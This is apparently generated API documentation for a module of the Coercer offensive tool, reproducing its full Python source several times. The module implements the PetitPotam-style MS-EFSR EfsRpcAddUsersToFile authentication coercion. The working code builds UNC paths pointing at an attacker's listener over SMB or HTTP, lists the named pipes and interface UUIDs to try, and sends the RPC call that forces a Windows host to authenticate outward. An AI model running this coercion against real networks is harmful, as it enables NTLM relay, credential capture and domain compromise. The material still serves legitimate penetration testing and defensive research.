coercer.methods.MS_EFSR.EfsRpcAddUsersToFile
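#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcAddUsersToFile.py
# Author             : XiaoliChan
# Date created       : 18 Mar 2023
"""Authentication coercion through MS-EFSR EfsRpcAddUsersToFile (opnum 9).

The caller controls the ``FileName`` argument of a remote EFSRPC call. The
target resolves that UNC path itself, so pointing it at a listener the
operator controls makes the target authenticate (SMB or HTTP) to that
listener. The method attribution below is to the author of PetitPotam, which
abuses the same EFSRPC interface.

Success is observed at the listener, not from the RPC return value: the
server's outbound authentication attempt typically happens before it reports
an error back for the unreachable path, so ``trigger()`` returning an
exception does not by itself mean the coercion failed (see ``trigger``).
"""


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class EFS_HASH_BLOB(NDRSTRUCT):
    """NDR structure for an EFS certificate hash blob.

    NOTE(review): the MS-EFSR IDL describes this blob as a byte count followed
    by a byte pointer (cbData / bData); the field names here look swapped with
    respect to that IDL. The coercion never populates this structure (see
    ``EfsRpcAddUsersToFile.trigger``), so whatever the default encoding is goes
    on the wire. Do not "fix" the layout without re-verifying the marshalled
    bytes against the spec.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """NDR structure for one user certificate entry.

    The 'Lenght' field name is kept as-is for compatibility: NDR field names
    are only keys into the structure and are not themselves marshalled, so
    renaming it buys nothing and could break code that indexes by that key.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )


class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """NDR structure for the certificate list passed to EfsRpcAddUsersToFile.

    Modelled as a count plus a single entry rather than a conformant array;
    this is never populated by the coercion, so the default encoding is sent.
    """
    structure = (
        ('nUsers', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )


class _EfsRpcAddUsersToFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    Only ``FileName`` is attacker-relevant: it is the UNC path the server will
    try to open, which is what forces the outbound authentication.
    """
    opnum = 9
    structure = (
        ('FileName', WSTR),  # Type: wchar_t *  -- attacker-controlled UNC path
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
    )


class _EfsRpcAddUsersToFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    Left empty on purpose: the response is never parsed by this method.
    """
    structure = ()


class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcAddUsersToFile (opnum 9) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)
    """

    # UNC path templates placed into FileName. The ``{{listener}}``,
    # ``{{..._listen_port}}`` and ``{{rnd(n)}}`` placeholders are presumably
    # expanded by the coercer framework before ``self.path`` is set (the
    # substitution is not done in this file). Both SMB and HTTP (WebDAV-style)
    # targets are offered. The explicit trailing NUL is kept exactly as the
    # original author wrote it; whether WSTR would also terminate the string is
    # not verified here, and the bytes on the wire must not change.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports over which the EFSRPC interface is tried. The dedicated
    # interface UUID is used on \PIPE\efsrpc; the same call is also attempted
    # with the second UUID over the lsarpc/samr/lsass/netlogon pipes, which is
    # what lets the method work when \PIPE\efsrpc itself is not exposed.
    # NOTE(review): the key is spelled "ncan_np" (not "ncacn_np"); this is the
    # spelling the coercer framework looks up, so leave it unless the consumer
    # is changed as well.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # ``vulnerable_arguments`` names the parameter the operator controls.
    function = {
        "name": "EfsRpcAddUsersToFile",
        "opnum": 9,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """Send one EfsRpcAddUsersToFile request with ``self.path`` as FileName.

        Args:
            dcerpc_session: a bound DCERPC session (``connect()`` must already
                have been called); ``None`` is reported and nothing is sent.
            target: kept for interface compatibility with the other coercion
                methods; it is not read here.

        Returns:
            ``""`` if the request was sent and answered without raising, the
            caught exception object if the call raised, or ``None`` when no
            session was given. An exception here is not proof the coercion
            failed: the server generally authenticates to the listener before
            it reports the unreachable path, so confirm at the listener.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcAddUsersToFile()
            request['FileName'] = self.path
            # The response is intentionally ignored; only the side effect of
            # the server opening the UNC path matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad on purpose: the framework reports whatever the transport
            # or RPC layer raised, rather than aborting the scan.
            return err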
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
Docstring inherited from impacket's NDR base class ("This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type"). It does not describe EFS_HASH_BLOB itself, which is an NDR structure (NDRSTRUCT) with the two fields listed below, not a primitive type.
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """NDR structure for one user certificate entry.

    The 'Lenght' field name is kept as written: NDR field names are only keys
    into the structure and are not marshalled, so the spelling does not affect
    the bytes on the wire. This structure is not populated by the coercion.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )
Docstring inherited from impacket's NDR base class ("This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type"). It does not describe ENCRYPTION_CERTIFICATE_HASH itself, which is an NDR structure (NDRSTRUCT) with the four fields listed below, not a primitive type.
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """NDR structure for the certificate list argument of EfsRpcAddUsersToFile.

    Modelled as a count plus a single entry rather than a conformant array.
    The coercion never populates it, so the default encoding is what is sent;
    do not change the layout without re-verifying the marshalled bytes.
    """
    structure = (
        ('nUsers', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )
Docstring inherited from impacket's NDR base class ("This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type"). It does not describe ENCRYPTION_CERTIFICATE_LIST itself, which is an NDR structure (NDRSTRUCT) with the two fields listed below, not a primitive type.
structure =
(('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
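class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcAddUsersToFile (opnum 9) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)

    The operator controls the ``FileName`` argument; the target resolves that
    UNC path itself and thereby authenticates to the listener. Judge success
    at the listener, not from the RPC return value.
    """

    # UNC path templates placed into FileName. The ``{{listener}}``,
    # ``{{..._listen_port}}`` and ``{{rnd(n)}}`` placeholders are presumably
    # expanded by the coercer framework before ``self.path`` is set (the
    # substitution is not done in this class). Both SMB and HTTP targets are
    # offered. The explicit trailing NUL is kept exactly as written so the
    # bytes on the wire do not change.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports to try. The dedicated EFSRPC interface UUID is used on
    # \PIPE\efsrpc; the same call is also attempted with the second UUID over
    # the lsarpc/samr/lsass/netlogon pipes, which covers hosts where
    # \PIPE\efsrpc itself is not exposed.
    # NOTE(review): the key is spelled "ncan_np" (not "ncacn_np"); this is the
    # spelling the framework looks up, so leave it unless the consumer changes.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # ``vulnerable_arguments`` names the parameter the operator controls.
    function = {
        "name": "EfsRpcAddUsersToFile",
        "opnum": 9,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """Send one EfsRpcAddUsersToFile request with ``self.path`` as FileName.

        Args:
            dcerpc_session: a bound DCERPC session (``connect()`` must already
                have been called); ``None`` is reported and nothing is sent.
            target: kept for interface compatibility with the other coercion
                methods; it is not read here.

        Returns:
            ``""`` if the request was sent and answered without raising, the
            caught exception object if the call raised, or ``None`` when no
            session was given. An exception is not proof the coercion failed:
            the server generally authenticates to the listener before it
            reports the unreachable path, so confirm at the listener.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcAddUsersToFile()
            request['FileName'] = self.path
            # Response intentionally ignored; only the server-side side effect
            # of opening the UNC path matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad on purpose: report whatever the transport or RPC layer
            # raised instead of aborting the scan.
            return err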
Coercing a machine to authenticate using function EfsRpcAddUsersToFile (opnum 9) of MS-EFSR Protocol. The operator-controlled argument is FileName: the target resolves that UNC path itself and authenticates to the listener it points at.
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
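def trigger(self, dcerpc_session, target):
    """Send one EfsRpcAddUsersToFile request with ``self.path`` as FileName.

    Args:
        dcerpc_session: a bound DCERPC session (``connect()`` must already
            have been called); ``None`` is reported and nothing is sent.
        target: kept for interface compatibility with the other coercion
            methods; it is not read here.

    Returns:
        ``""`` if the request was sent and answered without raising, the
        caught exception object if the call raised, or ``None`` when no
        session was given. An exception is not proof the coercion failed:
        the server generally authenticates to the listener before it
        reports the unreachable path, so confirm at the listener.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _EfsRpcAddUsersToFile()
        request['FileName'] = self.path
        # Response intentionally ignored; only the server-side side effect
        # of opening the UNC path matters.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Broad on purpose: report whatever the transport or RPC layer
        # raised instead of aborting the scan.
        return err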